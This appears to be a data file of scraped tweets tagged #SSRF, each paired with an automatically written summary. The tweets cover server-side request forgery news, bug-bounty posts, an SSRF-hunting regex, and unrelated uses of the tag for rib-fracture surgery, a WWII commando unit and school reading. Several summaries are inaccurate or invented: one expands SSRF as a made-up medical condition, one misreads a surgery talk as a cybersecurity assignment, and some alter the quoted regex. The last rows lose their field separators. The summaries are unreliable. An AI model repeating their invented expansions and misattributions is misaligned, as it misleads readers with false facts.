698 | 2024-09-22 16:28:48 UTC | Ke_Cyber: Don't wait for a breach - secure your site NOW before it's too late! #CyberSecurity #WordPress #Kenya #DataBreach #SSRF #XSS #SQLi #GovtSites #InfoSec #UpdateNow #SecurityThreat | The content emphasizes the urgency of securing websites to prevent data breaches. It highlights the importance of taking action immediately to protect against security threats like SSRF, XSS, and SQLi. The message targets WordPress users in Kenya and government sites, urging them to update their security measures promptly. The post stresses the significance of proactive cybersecurity measures to avoid potential breaches.
699 | 2024-09-20 13:23:36 UTC | true_redfence: INFORMATION Offensive Security Tool: SSRFPwned. SSRFPwned is developed by Chris Abou-Chabké from Black Hat Ethical Hacking. It is a tool that automates the process of testing for Server-Side Request Forgery (SSRF) #ssrf #offensivesecurity | SSRFPwned is an offensive security tool created by Chris Abou-Chabké from Black Hat Ethical Hacking. It automates testing for Server-Side Request Forgery (SSRF). The tool is designed to assist in identifying and addressing SSRF vulnerabilities efficiently. It aims to enhance offensive security practices by streamlining the SSRF testing process.
700 | 2024-09-19 19:18:26 UTC | JaneParrish: #News: @ProtectAICorp's Vulnerability Report uncovers 20 #security #flaws in #opensource #tools used for building #AI/#ML systems - incl Remote Code Execution #RCE in BerriAI/litellm, password reset in lunary-ai/lunary and #SSRF in gradio-app/gradio | @ProtectAICorp's Vulnerability Report reveals 20 security flaws in open-source tools for AI/ML systems. Issues include Remote Code Execution in BerriAI/litellm, password reset vulnerability in lunary-ai/lunary, and Server-Side Request Forgery in gradio-app/gradio. This poses risks to the security of AI projects.
701 | 2024-09-19 00:13:10 UTC | iototsecnews: Ivanti EPM vulnerabilities including CVE-2024-29847 fixed: risk of RCE #IvantiCloudServiceAppliance #IvantiCSA #IvantiEndpointManagement #IvantiEPM #IvantiWorkspaceControl #IWC #RCE #SSRF #Vulnerability #ZeroDay | The content discusses a vulnerability (CVE-2024-29847) in Ivanti EPM that could lead to a Remote Code Execution (RCE) issue. It mentions hashtags related to Ivanti products and security terms like SSRF, Vulnerability, and ZeroDay. The post warns about the potential risk posed by this vulnerability.
702 | 2024-09-18 13:13:48 UTC | Cybersleuth254: Found an SSRF vulnerability using a custom Nuclei template! This bug allows attackers to inject malicious URLs and access sensitive data on the server. #Cybersecurity #SSRF #BugBounty #PenTesting #Infosec #Nuclei | Cybersleuth254 discovered an SSRF vulnerability using a custom Nuclei template, enabling attackers to inject malicious URLs and access sensitive server data. The finding highlights the importance of cybersecurity measures like bug bounties, penetration testing, and information security. #Cybersecurity #SSRF #BugBounty #PenTesting #Infosec #Nuclei.
703 | 2024-09-18 13:13:48 UTC | Cybersleuth254: Found an SSRF vulnerability using a custom Nuclei template! This bug allows attackers to inject malicious URLs and access sensitive data on the server. Always validate inputs to prevent these threats! #Cybersecurity #SSRF #BugBounty #PenTesting #Infosec #Nuclei | Cybersleuth254 discovered an SSRF vulnerability using a custom Nuclei template, enabling attackers to inject malicious URLs and access sensitive server data. The importance of input validation to prevent such threats is emphasized. The post highlights cybersecurity, SSRF, bug bounty, penetration testing, and Nuclei.
704 | 2024-09-17 02:04:13 UTC | iototsecnews: MindsDB vulnerability CVE-2024-24759 fixed: PoC exploit also provided #AIML #DNSRebinding #Exploit #MindsDB #OpenSource #PoCExploit #Sim4n6 #SSRF #Vulnerability | The content discusses a vulnerability (CVE-2024-24759) in MindsDB, an open-source AI tool. It mentions the fix and the availability of a PoC exploit for this vulnerability. The post includes hashtags related to artificial intelligence, machine learning, DNS rebinding, exploit, vulnerability, and SSRF. The vulnerability and exploit details are shared on Twitter by iototsecnews.
705 | 2024-09-15 07:53:39 UTC | spencer_5cent: 1/2 For bug bounty I finally moved away from @SynackRedTeam even though I love and respect the platform I just wasn't getting any bugs. So in the past month I've already reported two #SSRF and one #blindxss on @Hacker0x01! | The content discusses a bug bounty hunter named spencer_5cent who switched from SynackRedTeam to Hacker0x01 due to lack of bugs. In the past month, they reported two Server-Side Request Forgery (#SSRF) and one Blind Cross-Site Scripting (#blindxss) vulnerabilities on Hacker0x01. The tweet expresses gratitude towards SynackRedTeam while highlighting the success on the new platform.
706 | 2024-09-13 21:48:34 UTC | e0xsecops: #CocaCola @CocaCola #SSRF | The content refers to a tweet by e0xsecops about CocaCola and SSRF (Server-Side Request Forgery). The tweet includes hashtags for CocaCola and SSRF, along with a link to the specific tweet on Twitter. It suggests that there may be some relevant information or discussion related to CocaCola and SSRF in the linked tweet.
707 | 2024-09-13 16:49:30 UTC | @killmongar1996: New blog: Found multiple SSRF vulnerabilities on a bank's system exposing AWS metadata! Learn how I uncovered these flaws and the security risks involved. Check it out! #CyberSecurity #AWS #SSRF #EthicalHacking #CloudSecurity | A new blog post by @killmongar1996 discusses discovering multiple SSRF vulnerabilities in a bank's system, exposing AWS metadata. The post details how these flaws were uncovered and the associated security risks. The content highlights the importance of addressing these vulnerabilities to enhance cybersecurity. The post is shared on Twitter with hashtags like #CyberSecurity, #AWS, #SSRF, #EthicalHacking, and #CloudSecurity. The link to the blog post is provided for those interested in learning more about the findings.
708 | 2024-09-13 00:43:35 UTC | CWISociety: CWIS Chairman of the Board of Directors @dotu3535. Management of Rib Fractures session presenting Surgical Stabilization of Rib Fracture Guidelines: Where are we?. Way to go Chairman! #cwismember #cwismemberresearch #ssrf | The content highlights the CWIS Chairman of the Board of Directors presenting on the topic of "Surgical Stabilization of Rib Fracture Guidelines" during a session on the Management of Rib Fractures. The post congratulates the Chairman on the presentation. The hashtags #cwismember, #cwismemberresearch, and #ssrf are used in the post.
709 | 2024-09-13 00:43:34 UTC | CWISociety: .@saranimd is leading the World Trauma Congress session Scientific Session VIIIA: Management of Rib Fractures. Here we go! #cwismember #ssrf | Dr. Sarani is leading a session on the Management of Rib Fractures at the World Trauma Congress. The event is part of Scientific Session VIIIA. This update was shared by CWISociety on Twitter, highlighting Dr. Sarani's involvement in the congress. The post also includes hashtags #cwismember and #ssrf.
710 | 2024-09-12 19:49:24 UTC | @MosharrofMahin: ChatGPT - Server Side Request Forgery (CVE-2024-27564) #ChatGPT #ssrf #CyberSecurity #bug | The content discusses a Server Side Request Forgery (SSRF) vulnerability in ChatGPT, identified as CVE-2024-27564 by @MosharrofMahin. The post highlights the cybersecurity issue and its potential impact, emphasizing the importance of addressing such vulnerabilities to prevent exploitation. The tweet includes relevant hashtags like #ChatGPT, #ssrf, #CyberSecurity, and #bug, indicating the focus on security concerns and bug reporting. For more details, the original tweet can be found at the provided Twitter link.
711 | 2024-09-12 18:39:37 UTC | CWISociety: .@thefighter_sm is making magic happen while addressing Management of Rib Fractures: The European perspective. #ssrf | The CWISociety highlights @thefighter_sm's work on managing rib fractures from a European perspective. The tweet acknowledges their efforts in addressing this topic and making a positive impact. The post includes applause emojis and a hashtag for the topic discussed. The content suggests that @thefighter_sm is achieving success in this area.
712 | 2024-09-12 18:39:35 UTC | sudosu01: It might not happen today in a week's time months or year - but remember each day is a step towards achieving that big win either through #RCE #CSRF #SSRF #SubDomainTakeover #SQL_Injection #WAFbypass -- keep waking up to that website until that big win! #sudo #bug | The content emphasizes the persistence required in cybersecurity, stating that achieving success through vulnerabilities like RCE, CSRF, SSRF, SubDomainTakeover, SQL Injection, and WAFbypass may take time. It encourages daily effort towards the goal and mentions the importance of staying dedicated until the big win is achieved. The use of hashtags like #sudo and #bug highlights the focus on security testing and bug hunting.
713 | 2024-09-12 17:39:32 UTC | CWISociety: CWIS President @saranimd is acing the assignment. SSRF: When and how? Well done sir! #cwismember #cwismemberresearch #ssrf | CWIS President @saranimd excels in an assignment on SSRF. The post praises his performance and asks about the timing and method of SSRF. The content is shared on CWISociety's Twitter account, highlighting the president's success and involvement in research. The hashtags #cwismember, #cwismemberresearch, and #ssrf are used to categorize the post.
714 | 2024-09-12 17:39:31 UTC | CWISociety: Past-President @zmbauman is moderating the World Trauma Congress Scientific Session IV: Management of Rib Fractures this morning. Packed house! #cwismember #cwismemberresearch #ssrf | The past-president of CWISociety, @zmbauman, is moderating the World Trauma Congress session on managing rib fractures. The event is well-attended. The post includes hashtags #cwismember, #cwismemberresearch, and #ssrf.
715 | 2024-09-12 15:44:20 UTC | @turkhacksths: What is Server-Side Request Forgery (SSRF)? SSRF makes it possible to use the server to send requests to another server or service (on the external or internal network). These requests are usually made over protocols such as HTTP, FTP and SMB. #SSRF #Hacking #CyberSecurity | The content discusses Server-Side Request Forgery (SSRF), which allows a server to make requests to another server or service, either in an external or internal network. These requests are typically made using protocols like HTTP, FTP, and SMB. The post emphasizes the importance of understanding SSRF for cybersecurity and hacking purposes.
716 | 2024-09-11 20:28:13 UTC | @BanCERT_gt: An SSRF (Server-Side Request Forgery) vulnerability was discovered in Microsoft Copilot Studio, putting the security of confidential data and internal systems at risk. Source: #BanCERT #Ciberseguridad #SSRF #MicrosoftCopilot #Vulnerabilidad | A Server-Side Request Forgery (SSRF) vulnerability was found in Microsoft Copilot Studio by @BanCERT_gt, posing a risk to confidential data and internal systems. The discovery highlights potential security threats. #BanCERT #Cybersecurity #SSRF #MicrosoftCopilot #Vulnerability
717 | 2024-09-10 20:05:27 UTC | @SEIDX57: Day 19 of the 25-day #THM challenge complete! Today I learned about Server-Side Request Forgery (SSRF). This vulnerability allows attackers to trick a server into making unauthorized requests to internal resources. Understanding it is key to preventing data breaches. #SSRF | The content discusses Day 19 of a challenge where the user learned about Server-Side Request Forgery (SSRF), a vulnerability that allows attackers to manipulate servers into making unauthorized requests to internal resources. Understanding SSRF is crucial in preventing data breaches. The user emphasizes the importance of awareness and knowledge about SSRF to enhance cybersecurity.
718 | 2024-09-10 14:19:10 UTC | qldfes: #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #bounty #hacker #vulnerability #ssrf #vdp #security #securityresearch #bughunter #researcher #pentester #pentesting #cybersecurity #VAPT | The content is a tweet from qldfes including various hashtags related to bug bounty programs, cybersecurity, and vulnerability testing. The tweet likely contains information or updates related to bug bounty tips, hacker communities like HackerOne and Bugcrowd, security research, and penetration testing. The tweet's content can be found by visiting the provided Twitter link.
719 | 2024-09-10 11:32:19 UTC | Critical server-side vulnerability in Microsoft Copilot Studio gives illegal access to internal infrastructure | A critical server-side vulnerability in Microsoft Copilot Studio has been identified, allowing unauthorized access to internal infrastructure. This security flaw poses a significant risk as it could potentially be exploited by malicious actors to gain unauthorized access to sensitive data and compromise the system. Microsoft Copilot Studio users should be vigilant and take immediate action to address this vulnerability to prevent any unauthorized access to their internal infrastructure.
720 | 2024-09-07 19:43:47 UTC | @TheRealB_Wayne: Gustavus Henry March-Phillipps DSO MBE (1908 - 12 September 1942; sometimes spelled "March-Phillips") was the founder of the British Army's No. 62 Commando also known as Small Scale Raiding Force (#SSRF) one of the forerunners of the Special Air Service (#SAS) | Gustavus Henry March-Phillipps, DSO, MBE, founded the British Army's No. 62 Commando, later known as Small Scale Raiding Force (#SSRF), a precursor to the Special Air Service (#SAS). He played a significant role in establishing these elite military units. March-Phillipps' contributions to the formation of specialized forces are noteworthy in military history.
721 | 2024-09-07 04:26:43 UTC | Critical server-side vulnerability in Microsoft Copilot Studio gives illegal access to internal infrastructure | A critical server-side vulnerability in Microsoft Copilot Studio has been identified, allowing unauthorized access to internal infrastructure. This vulnerability poses a significant security risk and requires immediate attention to prevent potential exploitation by malicious actors. Organizations using Microsoft Copilot Studio should take prompt action to address this issue and enhance their security measures to safeguard their systems and data.
722 | 2024-09-06 23:33:43 UTC | evert_eriksson: Super excited our article posted today in JTACS! #ssrf #cwisociety #cwis2024 #rib #jtacs Anatomy of the interchondral joints and the effects on... : Journal of Trauma and Acute Care Surgery | The content is a tweet by evert_eriksson expressing excitement about their article being published in the Journal of Trauma and Acute Care Surgery. The article discusses the anatomy of interchondral joints and their effects. Various hashtags like #ssrf, #cwisociety, #cwis2024, and #rib are included in the tweet.
723 | 2024-09-06 16:52:08 UTC | Introducing the URL validation bypass cheat sheet | A new resource called the URL validation bypass cheat sheet has been introduced. It aims to provide information on bypassing URL validation. The cheat sheet can be accessed at the provided link.
724 | 2024-09-06 16:24:40 UTC | DanaEpp: Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. #apihacking #ssrf | The content shared by DanaEpp discusses how to identify and exploit server-side request forgery (SSRF) vulnerabilities in an API. The article provides insights into the process of finding and exploiting SSRF vulnerabilities, offering valuable information for those interested in API hacking and security. DanaEpp's tweet includes hashtags #apihacking and #ssrf, directing readers to the article for further details on this topic.
725 | 2024-09-04 15:04:29 UTC | edgescan: Are you ready to protect against Server-Side Request Forgery #SSRF attacks? Learn from real-world incidents including the Capital One data breach and discover practical mitigation strategies. Make sure your applications are not susceptible to SSRF | Learn how to defend against Server-Side Request Forgery (SSRF) attacks by understanding real-world incidents like the Capital One data breach. Discover practical mitigation strategies to ensure your applications are not vulnerable to SSRF. Stay informed and protect your systems from potential security threats.
726 | 2024-09-04 14:05:21 UTC | apollocourtage: #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #bounty #hacker #vulnerability #ssrf #vdp #security #securityresearch #bughunter #researcher #pentester #pentesting #cybersecurity #VAPT | The content shared by apollocourtage on Twitter includes hashtags related to bug bounty, cybersecurity, hacker platforms, vulnerabilities, and security research. The post seems to focus on bug bounty tips, hacker platforms like HackerOne and Bugcrowd, various security terms like SSRF and VDP, as well as roles such as bug hunter, researcher, and pentester. The link provided likely leads to more information on these topics.
727 | 2024-09-04 08:04:36 UTC | @SandroBruscino: Learn how attackers bypass URL validation in SSRF attacks! PortSwigger's latest cheat sheet reveals key techniques. "Understanding these flaws is critical for defending web apps." #CyberSecurity #SSRF #WebSecurity | The content discusses how attackers bypass URL validation in SSRF attacks, with PortSwigger's cheat sheet revealing key techniques. Understanding these flaws is crucial for defending web apps. The post emphasizes the importance of cybersecurity, SSRF, and web security. Sandro Bruscino's tweet highlights the significance of recognizing and preventing vulnerabilities in web applications to enhance cybersecurity measures.
728 | 2024-09-03 16:58:41 UTC | @onewriteup: Advanced SSRF Security Strategies in 2024 #CyberSecurity #ssrf #BugBounty #ethicalhacking #bugbountytips | The content discusses advanced Server-Side Request Forgery (SSRF) security strategies in 2024, focusing on cybersecurity, bug bounty programs, and ethical hacking. The tweet provides insights and tips related to SSRF vulnerabilities and how to address them effectively. It aims to enhance awareness and understanding of SSRF risks and mitigation techniques within the cybersecurity community.
729 | 2024-09-03 13:58:13 UTC | CWISociety: Fascinating #AI analysis predicting LOS for #SSRF pts by Dr Hon Lok (David) Lo from Taiwan. #bigdata #Berlin2024 #CWISIntl | Dr. Hon Lok (David) Lo from Taiwan presented a fascinating AI analysis predicting Length of Stay (LOS) for patients with Systemic Sclerosis-Related Fibrosing (SSRF) conditions. The analysis likely involves big data and was shared at the CWISociety event, possibly related to a conference in Berlin in 2024. The tweet highlights the innovative use of AI in healthcare to forecast patient LOS, showcasing advancements in medical research and technology.
730 | 2024-09-03 12:53:54 UTC | @CWISociety: Dynamo Dr Elana Maccou @prismahealth showing new results about the benefits of improved outcomes for frail elderly trauma patients who received #SSRF. #Berlin2024 #CWISIntl | Dr. Elana Maccou from Prisma Health presented new findings on the positive impact of improved outcomes for frail elderly trauma patients who received SSRF treatment. The research was shared at the CWIS International conference, emphasizing the benefits of this approach. The tweet also mentions the upcoming event in Berlin in 2024.
731 | 2024-09-01 18:43:44 UTC | Jeffrey_Mark12: This regex just found me another #0day vulnerability of #SSRF in an open source project /await fetch\(.\$/ #BugBounty #bugbountytips #ethicalhacking #Hacking | Jeffrey_Mark12 discovered a #0day vulnerability related to Server-Side Request Forgery (SSRF) using a regex in an open source project. The regex pattern used was /await fetch\(.*\`$/. This finding was shared on Twitter with hashtags like #BugBounty, #bugbountytips, #ethicalhacking, and #Hacking. The tweet can be found at the link: https://twitter.com/Jeffrey_Mark12/status/1830302403905687855.
732 | 2024-09-01 11:43:30 UTC | @zapstiko: Read From SSRF to RFI: Exploiting a Vulnerability to Gain Remote Code Execution by Muhammad Qasim on Medium: #bugbountytips #bugbounty #SSRF #RCE | The content discusses an article titled "From SSRF to RFI: Exploiting a Vulnerability to Gain Remote Code Execution" by Muhammad Qasim on Medium. It covers insights on exploiting a vulnerability to achieve Remote Code Execution (RCE) through Server-Side Request Forgery (SSRF) and Remote File Inclusion (RFI). The post is related to bug bounty tips and highlights the importance of understanding and mitigating these security risks. The link provided leads to the original article on Medium.
733 | 2024-08-31 06:33:43 UTC | @KonwarAbhi98099: Small Bug Tip: Most of the injection related vulnerabilities have a unique category called "blind". All are searching for the classic ones. Few hunting for Blind: Blind SQLi, Blind XSS, Blind SSRF #bugbountytips #bugbounty #vulnerability #rxss #xss #sqli #ssrf | The content discusses a bug tip related to injection vulnerabilities, highlighting the unique category of "blind" vulnerabilities. It mentions that many focus on classic vulnerabilities, while only a few are hunting for blind SQLi, XSS, and SSRF vulnerabilities. The post includes hashtags related to bug bounty tips, vulnerability types, and specific vulnerabilities like XSS, SQLi, and SSRF. The content is shared on Twitter by user @KonwarAbhi98099.
734 | 2024-08-31 05:31:29 UTC | Tenable finds critical flaw in Microsoft's Copilot Studio | Tenable discovered a critical flaw in Microsoft's Copilot Studio. The vulnerability poses a significant risk and requires immediate attention. Further details about the nature of the flaw and potential impacts are not provided in the summary.
735 | 2024-08-30 14:34:26 UTC | SOEhistory: Major Anders Lassen earlier served with No. 62 Commando (also known as the Small Scale Raiding Force). SSRF (1941-43) formed around a small group of commandos under the command of SOE. #AndersLassen #62Commando #SSRF #SOE #WW2 | Major Anders Lassen, a member of No. 62 Commando (Small Scale Raiding Force), served under SOE during WW2. The SSRF was a specialized unit formed between 1941-43, operating under SOE's command. Anders Lassen's involvement highlights his significant role in covert operations during the war. #AndersLassen #62Commando #SSRF #SOE #WW2.
736 | 2024-08-30 13:28:42 UTC | @cyb3rshi3ld: Q: In cybersecurity what does a Server-Side Request Forgery (SSRF) attack seek to exploit? A) Misconfigured firewalls B) Weak password policies C) Remote server vulnerabilities D) Validation of server-side requests #cybersecurity #infosec #SSRF #hacking | A Server-Side Request Forgery (SSRF) attack exploits remote server vulnerabilities by manipulating server-side requests. It does not target misconfigured firewalls or weak password policies. This type of attack is a concern in cybersecurity and hacking.
737 | 2024-08-29 15:51:37 UTC | Tenable finds critical flaw in Microsoft's Copilot Studio | Tenable discovered a critical flaw in Microsoft's Copilot Studio. The vulnerability was identified as severe, potentially impacting the security of the software. This finding highlights the importance of ongoing security assessments and the need for prompt patching to prevent exploitation by malicious actors.
738 | 2024-08-29 02:28:17 UTC | @iototsecnews: Microsoft Copilot Studio vulnerability CVE-2024-38206: serious information leak fixed #AIML #Cloud #Copilot #Microsoft #SSRF #Tenable #Vulnerability | The content discusses a vulnerability (CVE-2024-38206) in Microsoft Copilot Studio that has been fixed to prevent serious information leakage. The issue was related to SSRF (Server-Side Request Forgery). The post highlights the importance of addressing vulnerabilities promptly to prevent data breaches. The hashtags #AIML, #Cloud, #Copilot, #Microsoft, #SSRF, #Tenable, and #Vulnerability are used to categorize the content.
739 | 2024-08-28 18:22:09 UTC | Microsoft Copilot Studio Vulnerability Could Expose Sensitive Data | A vulnerability in Microsoft Copilot Studio has been identified that could potentially expose sensitive data. This security flaw poses a risk of unauthorized access to confidential information. It is crucial for users of Copilot Studio to be aware of this vulnerability and take necessary precautions to protect their data. Microsoft may release updates or patches to address this issue, and users should stay informed about any developments to ensure the security of their information.
740 | 2024-08-28 18:22:08 UTC | NTLM Credential Theft in Python Windows Applications | The content discusses the vulnerability of NTLM credential theft in Python Windows applications. It highlights the risk of unauthorized access to sensitive information due to this security flaw. The article likely delves into the technical details of how this exploit can be used by attackers to steal credentials and compromise systems. It serves as a warning to developers and users about the importance of securing their applications to prevent such breaches.
741 | 2024-08-28 02:16:59 UTC | Tenable finds critical flaw in Microsoft's Copilot Studio | Tenable discovered a critical flaw in Microsoft's Copilot Studio. The vulnerability was identified by Tenable researchers, highlighting potential security risks in the software. This finding underscores the importance of thorough security assessments and prompt patching to protect against potential cyber threats.
742 | 2024-08-27 21:18:57 UTC | MsAcosta06: 6th grade ELA classes did a great job with their silent reading in the library today! #LearnersAtWork #SSRF | MsAcosta06 praised 6th-grade ELA classes for their successful silent reading session in the library. The students were engaged in reading, showcasing their dedication to learning. The post highlights the importance of silent sustained reading (#SSRF) and emphasizes the students' commitment to their education as active learners (#LearnersAtWork).
743 | 2024-08-27 14:18:17 UTC | DailyDarkWeb: Web Attacks (SSRF) #cybersecurity #infosec #cyberattack #web #ssrf | The content refers to DailyDarkWeb discussing Web Attacks, specifically Server-Side Request Forgery (SSRF). The post is related to cybersecurity, infosec, cyberattacks, and web security, highlighting the importance of protecting against SSRF attacks. The link provided leads to the tweet on Twitter for more information.
744 | 2024-08-26 19:18:39 UTC | @davidwillisowen: SSRF in Microsoft Copilot! #ssrf #tenable #copilot #bugbounty | The tweet by @davidwillisowen highlights a Server-Side Request Forgery (SSRF) vulnerability found in Microsoft Copilot, a tool developed by Microsoft. This vulnerability could potentially be exploited by attackers. The tweet mentions the bug bounty program and includes relevant hashtags like #ssrf, #tenable, #copilot, and #bugbounty. For more details, refer to the original tweet at the provided link.
745 | 2024-08-26 01:21:15 UTC | Tenable Team Unearths Critical Vulnerability in Microsoft Copilot Studio - Australian Cyber Security Magazine | The Tenable team discovered a critical vulnerability in Microsoft Copilot Studio, as reported by the Australian Cyber Security Magazine. The vulnerability poses a significant risk to the security of the software. For more details, refer to the original article at the provided link.
746 | 2024-08-25 06:53:56 UTC | @smugnier: [#Infosec][#Microsoft] Exploiting Microsoft #CopilotStudio gives access to sensitive #cloud #data. "An #SSRF bug in the custom #Copilot creation tool potentially exposed critical information" | Exploiting Microsoft CopilotStudio allowed access to sensitive cloud data due to an SSRF bug in the custom Copilot creation tool. This vulnerability potentially exposed critical information. The tweet highlights the security issue and its implications.
747 | 2024-08-24 14:43:50 UTC | chux13786509: This regex just found me another #0day vulnerability of #SSRF in an open source project /await fetch\(.\$/ #BugBounty #bugbountytips #ethicalhacking #Hacking | A user named chux13786509 discovered a #0day vulnerability related to Server-Side Request Forgery (#SSRF) in an open source project using a specific regex pattern. The vulnerability was found with the regex /await fetch\(.*\`$/ and was shared on Twitter with hashtags #BugBounty, #bugbountytips, #ethicalhacking, and #Hacking.
748 | 2024-08-24 01:33:29 UTC | @CONSEJOSIAC: An SSRF bug in Microsoft #Copilot Studio allowed researchers to access sensitive information in the cloud. Cybersecurity has never been so crucial! #Ciberseguridad #SSRF | An SSRF error in Microsoft #Copilot Studio allowed researchers to access sensitive cloud information, highlighting the critical importance of cybersecurity. #Cybersecurity #SSRF.
749 | 2024-08-23 16:13:58 UTC | @Horizon3ai: From @Horizon3Attack: Multiple new #SSRF vulnerabilities leading to NTLMv2 hash disclosure in three of the most popular #Python frameworks out there: Gradio by Hugging Face, Jupyter Server and Streamlit from Snowflake. Get all of the details on these CVEs at | Multiple new SSRF vulnerabilities have been discovered in popular Python frameworks Gradio by Hugging Face, Jupyter Server, and Streamlit from Snowflake, leading to NTLMv2 hash disclosure. Details on these CVEs are available at the provided link.
750 | 2024-08-22 21:48:54 UTC | veronicabp_: Tracked by #Microsoft as CVE-2024-38206, the vulnerability allows an authenticated attacker to bypass #SSRF protection in Microsoft Copilot Studio to leak sensitive cloud-based information | The tweet by veronicabp_ discusses a vulnerability tracked by Microsoft as CVE-2024-38206. This flaw allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio, enabling them to extract sensitive cloud-based information. The vulnerability poses a risk to the security of the affected software.
751 | 2024-08-22 11:43:49 UTC | @killmongar1996: Exciting News: New Blog Post Alert! I'm thrilled to announce the release of my latest article Finding SSRF by Full Automation! Dive in here: #SSRF #Automation #InfoSec #Security #BugBounty #PenTesting #EthicalHacking #Vulnerability | @killmongar1996 announced a new blog post titled "Finding SSRF by Full Automation" focusing on cybersecurity topics like SSRF, automation, InfoSec, bug bounty, pen testing, ethical hacking, and vulnerability. The post aims to provide insights and strategies related to these areas. Interested readers can access the full article through the provided link.
752 | 2024-08-22 09:51:18 UTC | Microsoft Copilot Studio Vulnerability Exploited to Access Sensitive Information | A vulnerability in Microsoft Copilot Studio was exploited to access sensitive information. The exploit allowed unauthorized access to confidential data, posing a security risk. Microsoft Copilot Studio users should be vigilant and take necessary precautions to protect their sensitive information from potential breaches.
753 | 2024-08-22 07:43:49 UTC | lsobiraj: Microsoft Copilot Studio: data leak possible through SSRF vulnerability #Datenschutz #ITSicherheit #CopilotStudio #CVE202438206 #Microsoft #Sicherheitslücke #SSRF #SSRFSchwachstelle | Microsoft Copilot Studio is vulnerable to a data leak due to a Server-Side Request Forgery (SSRF) weakness. This poses a risk to data privacy and IT security. The vulnerability is identified as CVE-2024-38206. The issue highlights a security flaw in Copilot Studio, potentially exposing sensitive information. The tweet by lsobiraj raises awareness about this SSRF vulnerability in Microsoft's Copilot Studio, emphasizing the importance of addressing such security gaps promptly.
754 | 2024-08-22 07:43:48 UTC | tarnkappe_info: Microsoft Copilot Studio: data leak possible through SSRF vulnerability #Datenschutz #ITSicherheit #CopilotStudio #CVE202438206 #Microsoft #Sicherheitslücke #SSRF #SSRFSchwachstelle | The content discusses a potential data leak in Microsoft Copilot Studio due to a Server-Side Request Forgery (SSRF) vulnerability. This vulnerability could lead to unauthorized access to sensitive information. The post highlights the importance of data protection and IT security in addressing this issue. The specific Common Vulnerabilities and Exposures (CVE) identifier for this vulnerability is mentioned as CVE-2024-38206. The tweet from tarnkappe_info provides further details on this security flaw.
755 | 2024-08-22 05:43:26 UTC | @FindSecCyber: #Microsoft patched a critical SSRF flaw (CVE-2024-38206) in Copilot Studio protecting sensitive data. Secure your cloud now! How the Exploit Works: #CyberSecurity #CloudSecurity #SSRF #CopilotStudio #Canada #CanadaCyberAwareness | Microsoft has fixed a critical SSRF vulnerability (CVE-2024-38206) in Copilot Studio to safeguard sensitive data. The post emphasizes securing cloud environments. The exploit details are related to cybersecurity, cloud security, SSRF, Copilot Studio, and Canadian cyber awareness. The tweet encourages taking action to protect cloud systems.
756 | 2024-08-22 02:43:32 UTC | manoj29191: Check out my latest article: Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data via @LinkedIn #Cybersecurity #Vulnerability #Microsoft #CVE202438206 #SSRF #InformationDisclosure #MicrosoftCopilot #SecurityFlaw | The content highlights an article by manoj29191 discussing Microsoft's patching of a critical Copilot Studio vulnerability that exposed sensitive data. The vulnerability, identified by CVE-2024-38206, involved SSRF and information disclosure, posing a security flaw. The article emphasizes cybersecurity concerns and the importance of addressing vulnerabilities promptly. The link provided leads to the original post on Twitter for further details.
757 | 2024-08-22 01:38:55 UTC | foxbook: Experts disclose a serious information-leak flaw in Microsoft Copilot Studio / Experts disclosed a critical information-disclosure flaw in Microsoft Copilot Studio #SecurityAffairs (Aug 21) #セキュリティ脆弱性 #Microsoft #SSRF #情報漏洩 #クラウドセキュリティ | Experts revealed a serious information-disclosure flaw in Microsoft Copilot Studio, impacting security. The vulnerability was disclosed on August 21, highlighting concerns about security risks related to SSRF and cloud security. The flaw was shared on foxbook's Twitter account, emphasizing the importance of addressing such vulnerabilities promptly to safeguard data and systems.
758 | 2024-08-21 22:21:52 UTC | Tenable research discovers critical vulnerability in Microsoft Copilot Studio - CRN | Tenable research has uncovered a critical vulnerability in Microsoft Copilot Studio, as reported by CRN. The vulnerability poses a significant risk to the security of the software. For more details, refer to the original source link provided.
759 | 2024-08-21 16:26:52 UTC | Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data | The Microsoft Copilot Studio exploit has led to the leakage of sensitive cloud data. This incident raises concerns about the security of cloud services and the potential risks associated with such vulnerabilities. It highlights the importance of robust security measures to protect sensitive information stored in the cloud.
760 | 2024-08-20 17:13:32 UTC | @Cyberwald_talks: #Microsoft #SSRF #CoPilot_Studio SSRFing the Web with the help of Copilot Studio | The content discusses SSRF (Server-Side Request Forgery) in the context of Microsoft's CoPilot Studio. It highlights how SSRF can be utilized with the assistance of Copilot Studio to manipulate requests sent from a server, potentially leading to security vulnerabilities. The link provided likely offers more details on this topic.
761 | 2024-08-19 06:06:55 UTC | Critical Flaws In Microsoft's Azure Health Bot Service | The content discusses critical flaws found in Microsoft's Azure Health Bot Service. Specific details about the flaws or their impact are not provided in the summary.
762 | 2024-08-18 07:48:56 UTC | akanbi_kunle: Happy Sunday Dive deep into SSRF & LFI vulnerabilities! Utilizing Wayback Machine & Waybackurls to expose secrets. Join forces & let's hunt! #BugBountyHunter #SSRF #LFI #Partner | The content shared by akanbi_kunle on Twitter encourages diving into SSRF & LFI vulnerabilities using tools like Wayback Machine & Waybackurls to uncover secrets. The post invites collaboration for hunting bugs and mentions relevant hashtags like #BugBountyHunter, #SSRF, #LFI, and #Partner. The focus is on exploring security vulnerabilities and working together to address them.
7632024-08-16 22:38:46 UTC@PedramGholizade: If you want to know what SSRF is and how this vulnerability in axios could have led to a site being hacked, be sure to watch Sina's video. He explained it very simply and fluently, well done man, and my condolences to you too, friend. #nodejs #axios #ssrfThe content discusses SSRF vulnerability in Axios, demonstrated in a video shared by @PedramGholizade. It explains what SSRF is and how it could be exploited to hack a website. The video provides a clear and simple explanation. The post also includes hashtags for Node.js, Axios, and SSRF.
7642024-08-16 05:28:49 UTCRajan22m: I completed the Web Security Academy lab: SSRF with blacklist-based input filter @WebSecAcademy #portswigger #websecurity #lab #hacking #ethicalhacker #ethicalhacking #bug #bugbountytips #ssrf #serverRajan22m completed the Web Security Academy lab on SSRF with a blacklist-based input filter. The post includes hashtags related to web security, hacking, ethical hacking, bug bounty tips, SSRF, and servers. The completion of this lab likely signifies Rajan22m's progress and expertise in web security and ethical hacking.
